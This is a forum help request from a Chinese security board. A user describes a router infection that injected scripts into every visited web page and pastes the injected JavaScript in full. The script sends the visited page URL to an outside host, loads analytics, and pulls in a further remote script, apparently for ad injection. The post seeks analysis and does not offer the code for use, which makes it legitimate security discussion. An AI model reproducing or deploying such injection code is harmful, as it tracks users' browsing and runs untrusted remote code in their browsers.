好友
阅读权限10
听众
最后登录1970-1-1
|
使用论坛附件上传样本压缩包时必须使用压缩密码保护,压缩密码:52pojie,否则会导致论坛被杀毒软件等误报,论坛有权随时删除相关附件和帖子!
病毒分析分区附件样本、网址谨慎下载点击,可能对计算机产生破坏,仅供安全人员在法律允许范围内研究,禁止非法用途!
禁止求非法渗透测试、非法网络攻击、获取隐私等违法内容,即使对方是非法内容,也应向警方求助!
本帖最后由 chenwenjie 于 2019-10-26 23:44 编辑
问题依旧在, 求助大佬~~
关于路由器病毒今天我在调试自己的网站时候, 发现网页的head头部被加入了不是我写的script,
本以为是服务器的问题, 询问了服务器提供商, 人家说根本没问题,
然后我就换了朋友的电脑打开我的网站, 却没有发现类似的脚本
于是我就换了个网络, 果然, 是我的电脑网络有问题, 我用手机开热点访问网页就不会出现问题了.
然后我就想到了, 重置路由器, 重置完路由器发现没有被插入脚本了,果然是路由器中病毒了,
可是我还是想知道到底是这些脚本有什么用, 是不是盗取信息的木马, 总觉得过两天还是会再中这个病毒...
以下是路由器中病毒时, 访问任何网站, 头部都会被添加的脚本信息截图, head标签里居然还给我加div标签, 够狠
求大神指示!
跳转后发现此JS代码:
(function() {
function b_eror_st() {
var hmeror = document.createElement("script");
hmeror.src = "https://hm.baidu.com/hm.js?82131f194bfafb51664235f31934ebe0";
var sceror = document.getElementsByTagName("script")[0];
sceror.parentNode.insertBefore(hmeror, sceror)
}
try {
try {
var jspt = document.createElement("script");
jspt.type = "text/javascript";
var cururl = "";
if (document) {
if (document.URL) {
cururl = document.URL
} else if (document.documentURI) {
cururl = document.documentURI
}
} else if (window && window.location && window.location.href) {
cururl = window.location.href
}
jspt.innerHTML = "var imgjspt = new Image();imgjspt.src = 'http://m.x.xchmai.com/jspt.htm?s=568808220&p=911&e=" + encodeURIComponent(cururl) + "';";
var jseror = document.getElementsByTagName("script")[0];
jseror.parentNode.insertBefore(jspt, jseror)
} catch(er) {
try {
var jspterr = document.createElement("script");
jspterr.type = "text/javascript";
var cururlerror = encodeURIComponent(er.stack ? er.stack.substr(0, 230) : er.message);
jspterr.innerHTML = "var imgjspt = new Image();imgjspt.src = 'http://m.x.xchmai.com/jspt.htm?s=568808220&p=901&e=" + cururlerror + "';";
var jserorer = document.getElementsByTagName("script")[0];
jserorer.parentNode.insertBefore(jspterr, jserorer)
} catch(erer) {}
}
var hm = document.createElement("script");
hm.src = "https://hm.baidu.com/hm.js?f5df380d5163c1cc4823c8d33ec5fa49";
var sc0 = document.getElementsByTagName("script")[0];
sc0.parentNode.insertBefore(hm, sc0);
var b = 0; (function() {
if (!document || !document.body) {
b++;
if (b >= 50) {
if (!document) {
b_eror_st();
throw new Error("document.error");
return
}
if (!document.body) {
b_eror_st();
document.body = document.createElement("body")
}
}
return setTimeout(arguments.callee, 100)
}
var m = {};
m.page_url = window.location.href;
m.dreamKey = "_maerd_dnegel_";
m.js_node = null;
function j() {
var z = document;
var x;
if (document.currentScript) {
x = document.currentScript
}
for (var v = z.scripts,
y = v.length - 1,
w; w = v[y--];) {
if (w.src && w.src.indexOf("/jquery.js") != -1 && w.src.indexOf("_zxcvb_pid") != -1 && w.src.indexOf("_qwert_sid") != -1) {
if (!w.getAttribute("used")) {
x = w;
break
}
}
}
if (x) {
m.js_node = x;
m.js_node.setAttribute("used", 1);
m.js_src = m.js_node.getAttribute("src")
}
return x
}
j();
if (!m.js_node || !m.js_src) {
throw new Error("no jsnode")
}
var d = function(y, v) {
var w = new RegExp("(\\?|#|&)" + v + "=([^&]*)(&|$)", "i");
var x = y.match(w);
return x !== null ? decodeURIComponent(x[2]) : ""
};
var i = null;
var l = null;
var r = m.js_src.split("?");
if (r.length == 2) {
i = r[1];
l = r[0].replace("jquery.js", "fshow.js");
var o = h(d(m.js_src, "_qwert_sid"));
if (o == 416153783) {
l = r[0].replace("jquery.js", "fshow3.js")
}
}
if (!i) {
throw new Error("param error")
}
function k() {
var v = new Date();
var x = v.getMonth() + 1;
var w = v.getDate();
return v.getFullYear() + "" + (x > 9 ? x: "0" + x) + "" + (w > 9 ? w: "0" + w)
}
var f = (function() {
var v = d(m.page_url, m.dreamKey);
return v == 1 ? true: false
})();
if (f) {
b_eror_st();
throw new Error("my frame");
return
}
var n = function(v) {
return v == v.parent ? 0 : (arguments.callee(v.parent) + 1)
};
m.page_frameCount = n(window);
var q = function() {
var v = 0;
try {
var y = window.top.document;
var w = window.parent.document;
v = 1
} catch(x) {
try {
var w = window.parent.document;
v = 2
} catch(x) {}
try {
var y = window.top.document;
v = 3
} catch(x) {}
}
return v
};
m.page_isHomo = q();
if (m.page_frameCount > 5) {
b_eror_st();
throw new Error("max Iframe:" + m.page_frameCount);
return
}
function h(v) {
if (typeof v !== "string") {
return v
}
if (typeof v.trim === "function") {
return v.trim()
} else {
return v.replace(/^(\u3000|\s|\t|\u00A0)*|(\u3000|\s|\t|\u00A0)*$/g, "")
}
}
var e = h(d(m.js_src, "_zxcvb_pid"));
m.ad_slot_id = h(d(m.js_src, "_qwert_sid"));
if (!e || !m.ad_slot_id) {
throw new Error("no sid")
}
var u = 0;
if (e.length == 12) {
m.ad_pub_id = e.slice(3);
m.ad_site_type = e.slice(0, 2);
u = e.slice(2, 3)
} else {
m.ad_pub_id = e
}
m.adid = m.ad_pub_id + "_" + m.ad_slot_id;
var p = h(d(m.js_src, "_mf"));
p = p || u;
if (m.page_frameCount > p) {
throw new Error("in iframe:" + m.page_frameCount)
}
var g = k();
var t = document.createElement("script");
t.async = "async";
t.src = l + "?" + i + "&_ver=" + g;
m.js_node.parentNode.insertBefore(t, m.js_node);
var s = (function() {
var w = 3,
y = document.createElement("div"),
x = y.getElementsByTagName("i");
while (y.innerHTML = "<!--[if gt IE " + (++w) + "]><i></i><![endif]-->", x[0]) {}
return w > 4 ? w: false
} ());
if (!s) {
m.js_node.parentNode.removeChild(m.js_node)
}
})()
} catch(c) {
b_eror_st();
function a(i, g) {
var j = document,
l = window,
k = encodeURIComponent;
try {
var n = [];
n.push("name=" + k(i.name));
n.push("msg=" + k(i.stack ? i.stack.substr(0, 230) : i.message));
n.push("ref=" + k(j.referrer));
n.push("ex=" + k(g));
n.push("rnd=" + Math.floor(2147483648 * Math.random()))
} catch(m) {}
}
a(c, "boot.js")
}
})(window, document); |
|
发表于 2019-10-26 23:11
|
发表于 2019-10-26 23:34
